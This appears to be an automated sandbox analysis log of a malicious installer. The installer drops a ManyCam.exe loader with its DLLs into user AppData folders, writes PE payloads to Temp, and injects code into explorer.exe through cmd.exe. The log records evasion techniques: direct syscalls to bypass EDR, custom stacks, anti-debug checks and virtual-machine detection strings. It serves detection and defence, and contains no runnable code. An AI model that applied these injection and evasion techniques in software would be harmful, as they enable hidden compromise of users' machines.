Source:	Binary string: d:\branch_2.5\bin\cximagecrt.pdb source: ManyCam.exe, 00000002.00000003.1722253839.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728838914.0000000010062000.00000002.00000001.01000000.00000004.sdmp, ManyCam.exe, 00000004.00000002.1782423953.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 0000000D.00000002.2146322134.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, ManyCam.exe, 00000014.00000002.2265644240.0000000010062000.00000002.00000001.01000000.0000000C.sdmp, cximagecrt.dll.2.dr
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8` source: ManyCam.exe, 00000002.00000003.1722869253.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1726574265.0000000000CED000.00000002.00000001.01000000.00000008.sdmp, ManyCam.exe, 0000000D.00000002.2143708101.0000000001CBD000.00000002.00000001.01000000.00000011.sdmp, highgui099.dll.1.dr, highgui099.dll.2.dr
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8`5 source: ManyCam.exe, 00000014.00000002.2263483979.000000000134D000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdb source: ManyCam.exe, 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmp, ManyCam.exe, 00000002.00000003.1722213062.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1780407779.00000000012A1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 0000000D.00000002.2143919882.0000000001D91000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000014.00000002.2262286911.0000000000BD1000.00000002.00000001.01000000.0000000D.sdmp, cxcore099.dll.2.dr
Source:	Binary string: ntdll.pdb source: explorer.exe, 0000000C.00000002.2944291211.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943743699.00000000024CF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461769193.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461462563.000000000285A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: diaLocatePDB-> Looking for %s... %s%s.pdbFPOPDATAXDATAOMAPFROMOMAPTO$$$IP not set! source: dbghelp.dll.2.dr, dbghelp.dll.1.dr
Source:	Binary string: wntdll.pdbUGP source: ManyCam.exe, 00000002.00000002.1728344317.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728525433.0000000004610000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781701720.0000000004210000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781566718.0000000003EB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781889758.00000000045C2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016294201.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016062629.0000000004968000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145627834.0000000004620000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145908335.00000000049E4000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145394558.00000000042CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201079744.000000000473B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201420664.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265114412.0000000004200000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264930587.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265292803.00000000045B4000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459066841.0000000005508000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459492681.00000000059B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: explorer.exe, 0000000C.00000002.2944291211.0000000002A20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2943743699.00000000024CF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461769193.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2461462563.000000000285A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ManyCam.exe, 00000002.00000002.1728344317.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1728525433.0000000004610000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781701720.0000000004210000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781566718.0000000003EB7000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781889758.00000000045C2000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016294201.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2016062629.0000000004968000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145627834.0000000004620000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145908335.00000000049E4000.00000004.00000001.00020000.00000000.sdmp, ManyCam.exe, 0000000D.00000002.2145394558.00000000042CF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201079744.000000000473B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2201420664.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265114412.0000000004200000.00000004.00000800.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2264930587.0000000003EAF000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000014.00000002.2265292803.00000000045B4000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459066841.0000000005508000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.2459492681.00000000059B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb8`> source: ManyCam.exe, 00000004.00000002.1780618905.00000000013DD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\highgui099.pdb source: ManyCam.exe, 00000002.00000003.1722869253.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1726574265.0000000000CED000.00000002.00000001.01000000.00000008.sdmp, ManyCam.exe, 00000004.00000002.1780618905.00000000013DD000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 0000000D.00000002.2143708101.0000000001CBD000.00000002.00000001.01000000.00000011.sdmp, ManyCam.exe, 00000014.00000002.2263483979.000000000134D000.00000002.00000001.01000000.00000011.sdmp, highgui099.dll.1.dr, highgui099.dll.2.dr
Source:	Binary string: c:\Program Files\OpenCV\bin\cv099.pdb source: ManyCam.exe, 00000002.00000003.1721864520.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000002.00000002.1726798935.0000000000D9F000.00000002.00000001.01000000.00000009.sdmp, ManyCam.exe, 00000004.00000002.1780537279.000000000136F000.00000002.00000001.01000000.00000010.sdmp, ManyCam.exe, 0000000D.00000002.2143577088.0000000001C4F000.00000002.00000001.01000000.00000010.sdmp, ManyCam.exe, 00000014.00000002.2263214291.00000000012DF000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\Program Files\OpenCV\bin\cxcore099.pdbu source: ManyCam.exe, 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmp, ManyCam.exe, 00000002.00000003.1722213062.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1780407779.00000000012A1000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 0000000D.00000002.2143919882.0000000001D91000.00000002.00000001.01000000.0000000D.sdmp, ManyCam.exe, 00000014.00000002.2262286911.0000000000BD1000.00000002.00000001.01000000.0000000D.sdmp, cxcore099.dll.2.dr
Source:	Binary string: d:\branch_2.5\Bin\CrashRpt.pdb source: ManyCam.exe, 00000002.00000002.1727587033.0000000002012000.00000002.00000001.01000000.00000005.sdmp, ManyCam.exe, 00000002.00000003.1721444923.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000002.1781040561.0000000002012000.00000002.00000001.01000000.0000000E.sdmp, ManyCam.exe, 0000000D.00000002.2144076067.0000000002012000.00000002.00000001.01000000.0000000E.sdmp, ManyCam.exe, 00000014.00000002.2264405365.0000000002012000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: d:\branch_2.5\bin\ManyCam.pdb source: ManyCam.exe, 00000002.00000000.1712938372.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmp, ManyCam.exe, 00000002.00000003.1723593860.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, ManyCam.exe, 00000004.00000000.1724343155.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000004.00000002.1780057255.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000000.2085992542.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 0000000D.00000002.2142203285.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000000.2198684658.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe, 00000014.00000002.2261945134.000000000053B000.00000002.00000001.01000000.0000000B.sdmp, ManyCam.exe.2.dr
Source:	Binary string: dbghelp.pdb source: ManyCam.exe, 00000002.00000002.1728941425.000000006D511000.00000020.00000001.01000000.00000006.sdmp, ManyCam.exe, 00000004.00000002.1782504102.000000006D511000.00000020.00000001.01000000.0000000F.sdmp, ManyCam.exe, 0000000D.00000002.2146407239.000000006D511000.00000020.00000001.01000000.0000000F.sdmp, ManyCam.exe, 00000014.00000002.2265718075.000000006D511000.00000020.00000001.01000000.0000000F.sdmp, dbghelp.dll.2.dr, dbghelp.dll.1.dr

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_0052309D IsProcessorFeaturePresent,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,InterlockedCompareExchange,GetProcessHeap,HeapFree,

2_2_0052309D

Source: klxgok.6.dr	Static PE information: real checksum: 0x0 should be: 0x98d8e
Source: dbghelp.dll.2.dr	Static PE information: real checksum: 0x8050c should be: 0x7c27e
Source: dbghelp.dll.1.dr	Static PE information: real checksum: 0x8050c should be: 0x7c27e
Source: blggjuprkr.22.dr	Static PE information: real checksum: 0x0 should be: 0x98d8e

Source: klxgok.6.dr	Static PE information: section name: rwtv
Source: blggjuprkr.22.dr	Static PE information: section name: rwtv

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_005242D1 push ecx; ret	2_2_005242E4
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00C40361 push ecx; ret	2_2_00C40374
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_005242D1 push ecx; ret	4_2_005242E4
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012A0361 push ecx; ret	4_2_012A0374

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\gjs_channel_x86\cximagecrt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\gjs_channel_x86\CrashRpt.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Hazan\cv099.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\blggjuprkr	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Hazan\dbghelp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Hazan\cxcore099.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\gjs_channel_x86\dbghelp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Hazan\CrashRpt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\gjs_channel_x86\highgui099.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\klxgok	Jump to dropped file
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\gjs_channel_x86\cv099.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Hazan\cximagecrt.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\Hazan\highgui099.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	File created: C:\Users\user\AppData\Roaming\gjs_channel_x86\cxcore099.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\klxgok			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\blggjuprkr			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\KLXGOK
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BLGGJUPRKR

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	API/Special instruction interceptor: Address: 6CC57C44
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	API/Special instruction interceptor: Address: 6CC57C44
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	API/Special instruction interceptor: Address: 6CC57945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6CC53B54
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	API/Special instruction interceptor: Address: 6C687C44
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	API/Special instruction interceptor: Address: 6C687945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C683B54

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\blggjuprkr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\klxgok			Jump to dropped file

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	API coverage: 0.2 %
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	API coverage: 0.2 %

Source: C:\Windows\explorer.exe TID: 4284

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,		2_2_004164A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,		4_2_004164A0

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_00C3D5E0 GetSystemInfo,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,QueryPerformanceFrequency,

2_2_00C3D5E0

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: explorer.exe, 0000000C.00000003.2658755580.0000000000914000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2052808307.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2657990402.0000000000907000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2032220491.0000000000907000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: explorer.exe, 0000000C.00000003.2658709771.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp^

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_00523722 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

2_2_00523722

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

2_2_0052309D

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_00523077 GetProcessHeap,HeapFree,

2_2_00523077

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Local\Hazan\ManyCam.exe "C:\Users\user\AppData\Local\Hazan\ManyCam.exe"

Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: 2_2_00523722 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,		2_2_00523722
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_00523722 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,		4_2_00523722

Source: C:\Windows\explorer.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	NtProtectVirtualMemory: Direct from: 0x6BCD2DBC	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	NtQuerySystemInformation: Direct from: 0x6D513079	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	NtProtectVirtualMemory: Direct from: 0x6CBC2A64	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	NtProtectVirtualMemory: Direct from: 0x6C624266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	NtSetInformationThread: Direct from: 0x6D51245D	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 5548 base: 7FF72B812D10 value: 48	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 5548 base: 64D010 value: 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6276 base: 7FF72B812D10 value: 48	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6276 base: BD5010 value: 00	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\explorer.exe base: 7FF72B812D10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\explorer.exe base: 64D010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\explorer.exe base: 7FF72B812D10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\explorer.exe base: BD5010	Jump to behavior

Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\local\hazan\manycam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\gjs_channel_x86\manycam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\gjs_channel_x86\manycam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\roaming\gjs_channel_x86\manycam.exe"
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "c:\windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "manycam" -v "manycam llc" -s "to work properly, this app must be reinstalled after you upgrade windows." -n 4 -f 0 -k 0 -e "c:\users\user\appdata\local\hazan\manycam.exe"	Jump to behavior
